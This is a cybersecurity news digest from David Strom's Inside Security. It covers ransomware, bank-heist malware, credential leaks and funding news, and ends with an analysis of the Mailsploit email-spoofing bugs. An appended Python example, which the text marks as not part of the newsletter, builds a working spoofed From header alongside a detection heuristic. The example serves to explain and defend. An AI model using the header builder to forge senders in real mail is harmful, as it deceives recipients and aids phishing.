Inside Security | Inside


David Strom's in-depth cybersecurity analysis

David’s Take

We have a collection of new and old ransomware attacks discovered over the past week, showing how criminals just can’t get enough of this tactic, and some are even using A/B testing to refine their techniques.

I have been posting numerous articles about the changing world of SSL certs and how EV certs are being used by criminals to make their phishing sites appear more legit. Now a security researcher has set up his own demonstration site to illustrate the problem. Take a look at the site. From the browser's point of view (the EV indicator and the certificate details) it resembles the Stripe UK payment site, and the certificate vouches for an entity called Stripe Inc. Well, that isn’t the Stripe you are looking for: it is another company with the same name that the researcher incorporated in a different state just to prove his point. Dan Goodin from Ars writes, “people should remember that EV certificates aren't automatically a panacea for online fraud.”

My favorite report for today is from Watchguard, which has been posting a series of predictions to its blog in a very attractive and still informative way. There are ones about IoT botnets, a doubling of Linux-based attacks, what will happen to MFA, and the state of election and voter hacking.

--David Strom, editor of Inside Security


Top Story: Russian-based MoneyTaker malware on the rise

A Russian-speaking cybercrime group has stolen millions of dollars from more than 20 banks (some shown here in this graphic) in the US and Russia since at least May 2016 and appears poised to strike financial institutions across Latin America next. According to this research from Moscow-based Group-IB, the group manipulates card processing systems to enable fraudulent ATM withdrawals, hence the name given to the group. And the yields are huge: we are talking about roughly half a million dollars stolen per heist. What is new is how frequently the hackers change tactics and tools and take pains to hide their actions. In one case the researchers traced the intrusion back to the compromised home PC of a bank’s system administrator.


Attacks and vulnerabilities

A new variant of Blind ransomware carrying a .napoleon extension is being delivered via hacked Microsoft IIS web servers and is now operating in the wild. More details in this post. -- MALWAREBYTES


David’s Take

My favorite year-end report today is from Incapsula, which reports that three out of four bitcoin sites were attacked and a third of the network attacks were persistent.  DDoS volumes are increasing and five percent of network layer assaults reached 50 Mpps, while the largest peaked at 238 Mpps.  Hong Kong was the most targeted country for network layer assaults in Q3 2017, largely because of a persistent attack on a local hosting service that was hit hundreds of times throughout the quarter. This brings home the increasing automation and scope of botnets.

-- David Strom, editor of Inside Security


Attacks and vulnerabilities

A Dark Web source revealed almost a billion and a half leaked user credentials and passwords, which could make it the largest trove of such data ever disclosed. Researchers suggest the information is culled from numerous individual breaches. The most used password is ‘123456’ -- of course. -- HACKREAD

A HomeKit vulnerability in the current version of iOS 11.2 can allow unauthorized control of accessories including smart locks and garage door openers that are connected to your Apple smart home products. Apple has rolled out a server-side fix and is working on an update to iOS. – 9TO5MAC


Tech support scammers have been using the Spotify forums to inject their phone numbers into the first page of the Google and Bing search results. This pushes up their search rank, so that people looking for a support line find the scammer's number and end up paying for bogus services. The brands being impersonated in the Spotify posts include Tinder, Linksys, AOL, Turbotax, Coinbase, Amazon, Apple, Microsoft, Norton, McAfee and others. Spotify acknowledged the issue. – CODY JOHNSTON @ TWITTER

Self-promotions dep’t

Here are some best practices to create your own security awareness training efforts, written by someone from KnowBe4 who just coincidentally sells them. Remember, it is the journey not the destination. Still worth reading. – INFOSEC ISLAND

New products and services

AIG is now using a risk analysis system for data breach potential with its corporate insurance customers. The score also takes into account the potential financial losses from a breach. The company also announced partnerships with CrowdStrike and Darktrace to launch a new service called CyberMatics to verify cyber security protection. -- REUTERS


Just for fun

He is serious about his security, because he is salting his hash, get it? Har-har. -- REDDIT


Microsoft leaked a private TLS key for its cloud-based Dynamics ERP service, and it was still available online for three months. It took a determined security researcher to get to the right person within Microsoft to get this resolved. Had this fallen into the wrong hands, man-in-the-middle attacks would have been child’s play. – MATTHIAS GLIWKA @MEDIUM


Google describes some of the recent security innovations for its Chrome browser, including site isolation, TLS improvements and permissions restrictions. Time to make sure your browsers are updated. – GOOGLE BLOG

AWS announced an SSO tool for its numerous web services, along with support for other SAML apps and SaaS accounts. It integrates with Microsoft Active Directory and works with AWS CloudTrail to log access events.

Funding and merger announcements of the week

Tel Aviv-based Ironscales announced the closing of a $6.5M Series A, led by K1 Investment Management. The firm has automated phishing and fraud detection and its CEO is Eyal Benishti.

Integrity360 has acquired managed IT security specialist Metadigm, expanding the firm’s presence in the UK. Financial terms were not disclosed.

Continuum Security has secured €1.5M in funding. It is based in Madrid and does integrated threat modeling. Stephen De Vries is its CEO.

Prevoty, a rising application security innovator with offices in LA and the Bay Area, announced $13M in Series B funding from investors including Trident Capital Cybersecurity. The firm specializes in autonomous application self-protection and is led by CEO Julien Bellanger.

Overhaul received a $4.5M seed funding round led by Abbey International Finance. It is based in Austin and its CEO is Barry Conion. The firm has a platform to detect non-compliance in premium cargo shipping.

Integrated Biometrics received a $2M funding round. The company is based in South Carolina and is developing FBI-certified fingerprint sensors. The firm’s CEO is Stephen Thies.

Alcide received a $5.2M seed funding round led by Intel Capital and has CEO Ranny Nachmias. It is based in Tel Aviv and is developing a network security platform.

NS8 received a $7.5M seed funding round led by Arbor Ventures. The firm is based in the DC area and has fraud abuse protection for ecommerce merchants. It is led by CEO Adam Rogas.


Just for fun

Sometimes security people look for the wrong events. A recent article about how a scammer tricked TripAdvisor into listing his non-existent restaurant (the photo shows his backyard) as London’s top dining spot without ever taking on any customers or serving any meals is worth reading. Turns out TripAdvisor was watching for real restaurants posting fake reviews, not for fake restaurants. Oops. -- VICE

David's Take

This was an active week for numerous vulnerabilities and attacks and our newsletter today highlights many of them. Some weeks it seems as if everything you use has issues: WordPress, Plone, TeamViewer, and several Android developer tools will all require updates, and there is a very serious flaw in Windows' malware scanning engine as well. And then there is this news, where government servers in Mecklenburg County, North Carolina are infected with ransomware. The county has refused to pay $23,000 to decrypt the files. The LockCrypt malware was delivered through a phished email attachment. “It was going to take almost as long to fix the system after paying the ransom as it does to fix it ourselves,” said the county’s manager. Uhh, perhaps a better reason could be that they have current backups?

If you aren't yet a Premium subscriber, you missed yesterday's analysis about the poor reporting around the Mailsploit issue, which isn't as serious as first thought. Go to our Premium page and sign up, subscription plans start at $10/month with multiple newsletters and corporate plans available. Premium subscribers get an additional Thursday newsletter, usually with a single analysis topic.

-- David Strom, editor of Inside Security


Attacks and vulnerabilities

Ethiopian dissidents in the US, UK, and other countries were targeted with emails carrying sophisticated commercial spyware, deployed by operators linked to the Ethiopian state. The lures posed as Adobe Flash updates and PDF plugins. – CITIZEN LAB


Nearly 5,500 WordPress sites are infected with a malicious script that logs keystrokes and sometimes loads an in-browser cryptocurrency miner. The malicious script is being loaded from a phony domain that contains the word cloudflare, to make it look more legit. What is unusual about this malware is that it can be loaded on both the front and back ends of WP installations, so it can capture site admin passwords as they are typed into the login and dashboard pages. – BLEEPING COMPUTER


Just for fun

Likely.   -- VISS@TWITTER


Is Mailsploit for real?

Earlier this week, the developer Sabri Haddouche announced with great fanfare a “collection of bugs in email clients that allow effective sender spoofing and code injection attacks,” under the name Mailsploit. He found bugs in more than 30 different email clients that supposedly circumvent email protocols such as DMARC, DKIM and SPF, the holy trinity of protection that I have written about extensively on my blog here and in past newsletters.

There are actually two different attack vectors described on the Mailsploit website. The first has to do with malformed mail headers: non-ASCII text in the From header is wrapped in RFC 1342 encoded-words (the base64 or quoted-printable =?utf-8?...?= syntax), and the decoded text contains null bytes or newlines that the client renders badly, so the user sees a spoofed address while the real sending address sits after the encoded word. The second has to do with XSS and code injection attacks in the message bodies. Let’s address them in order.

The spoofing attack isn’t really new. While email clients have some issues, what Mailsploit is saying is far from the Chicken Little scenario. DMARC et al. are still sound, and these exploits have little or nothing to do with them. The second XSS attack is more serious, and certain email clients will need patching.

Contributing to the bad information here are my colleagues in the trade press. Wired says: “Haddouche has shown that he can trick email servers into reading email headers one way, while email client programs read them differently.” Well yes, that is essentially true. But not news. Catalin Cimpanu of Bleeping Computer, who normally is very accurate with his reporting, says this email spoofing attack circumvents all modern anti-spoofing protection mechanisms such as DMARC (DKIM/SPF) or various spam filters. That is just false.

“Mailsploit fools DMARC in much the same way that putting Donald J. Trump as your display name in Gmail ‘fools DMARC.’ That is to say, not at all,” says a post on Valimail’s blog. John Wilson from Agari has a similar response on their blog. Note: Both Valimail and Agari sell DMARC-based protection services, so they have some vested interest here. But that doesn’t excuse the sloppy reporting.

The spoofing issue is how encoded non-ASCII header text is decoded and displayed, a close cousin of the punycode issue that I recently wrote about in this newsletter. Both come down to how clients render text that isn't plain ASCII, and lookalike sender names have been a staple of phishing attacks for years.

So what should you do? First, look at Haddouche’s spreadsheet of mail clients (a portion shown below) and see who has patched and who hasn’t. Most of the major email vendors, including Gmail, Office 365 and Outlook, aren’t affected, and Yahoo has already fixed the vulnerability. (Kudos to Haddouche for working responsibly with the vendors prior to disclosing the issue.)

Second, if you are using an email client that hasn’t been patched, now is the time to switch to one that has. Just in time for consideration is a new free product from ProtonMail called Bridge that lets you use their end-to-end encrypted email service from Thunderbird, Apple Mail or Outlook. Bridge automatically encrypts and decrypts in the background.

Finally, study the punycode and homograph attacks of the past so you understand the display-layer trick that is going on here.
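To make the header trick concrete, here is an added Python example (not code from Haddouche's site or from this newsletter) that constructs a From header in the Mailsploit style, shows what a client that stops rendering at a control character would display, shows which domain DMARC alignment actually operates on, and includes the kind of defensive check a mail gateway could apply. The header, the addresses and the domain mailsploit.example are constructed for illustration; the client emulation is deliberately simplified (a single encoded-word, and a split on the last '@' instead of a full RFC 5322 address parser).

```python
import base64
import quopri
import re

# Matches one RFC 1342 / RFC 2047 encoded-word: =?charset?B|Q?payload?=
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([bBqQ])\?([^?]*)\?=")


def decode_encoded_words(header: str) -> str:
    """Decode encoded-words the way a mail client's display layer does.

    The decoded text is handed straight to the UI; nothing here strips
    control characters, which is exactly what the Mailsploit trick relies on.
    """
    def _replace(match: re.Match) -> str:
        charset, encoding, payload = match.group(1), match.group(2).lower(), match.group(3)
        if encoding == "b":
            raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        else:  # "q": quoted-printable, header variant (underscore means space)
            raw = quopri.decodestring(payload.encode("ascii"), header=True)
        return raw.decode(charset, errors="replace")

    return ENCODED_WORD.sub(_replace, header)


def build_spoofed_from(display_as: str, attacker_domain: str, terminator: str = "\x00") -> str:
    """Build a Mailsploit-style From header (constructed example, not a real message).

    The text the victim should see is base64-encoded together with a control
    character; the real addr-spec domain follows the encoded word.
    """
    payload = base64.b64encode((display_as + terminator).encode("utf-8")).decode("ascii")
    return f"=?utf-8?b?{payload}?=@{attacker_domain}"


def what_a_vulnerable_client_shows(header: str) -> str:
    """Emulate a client that stops rendering at the first NUL, CR or LF."""
    decoded = decode_encoded_words(header)
    return re.split(r"[\x00\r\n]", decoded, maxsplit=1)[0]


def domain_dmarc_aligns_on(header: str) -> str:
    """The RFC5322.From domain that DMARC alignment uses.

    It is taken from the raw header before any encoded-word decoding, so the
    spoofed text inside the encoded word never reaches the check. Simplified:
    a real MTA uses a full RFC 5322 parser, not a split on the last '@'.
    """
    return header.rsplit("@", 1)[1].strip().rstrip(">").lower()


def is_suspicious_from(header: str) -> bool:
    """Defensive heuristic for a gateway: flag a From header whose decoded form
    contains control characters, or that hides an '@' inside an encoded word."""
    decoded = decode_encoded_words(header)
    has_control = any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded)
    hidden_at = any(
        "@" in decode_encoded_words(m.group(0)) for m in ENCODED_WORD.finditer(header)
    )
    return has_control or hidden_at


if __name__ == "__main__":
    hdr = build_spoofed_from("potus@whitehouse.gov", "mailsploit.example")
    print("raw header        :", hdr)
    print("vulnerable client :", what_a_vulnerable_client_shows(hdr))
    print("DMARC aligns on   :", domain_dmarc_aligns_on(hdr))
    print("flagged           :", is_suspicious_from(hdr))
```

Run it and the three outputs tell the whole story: the vulnerable client prints potus@whitehouse.gov, DMARC aligns on mailsploit.example (the attacker's own domain, for which its SPF and DKIM records are perfectly valid), and the heuristic flags the header. The legitimate use of encoded-words, a non-ASCII display name such as =?utf-8?b?SsO8cmdlbg==?= <j@example.com>, decodes cleanly and is not flagged.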
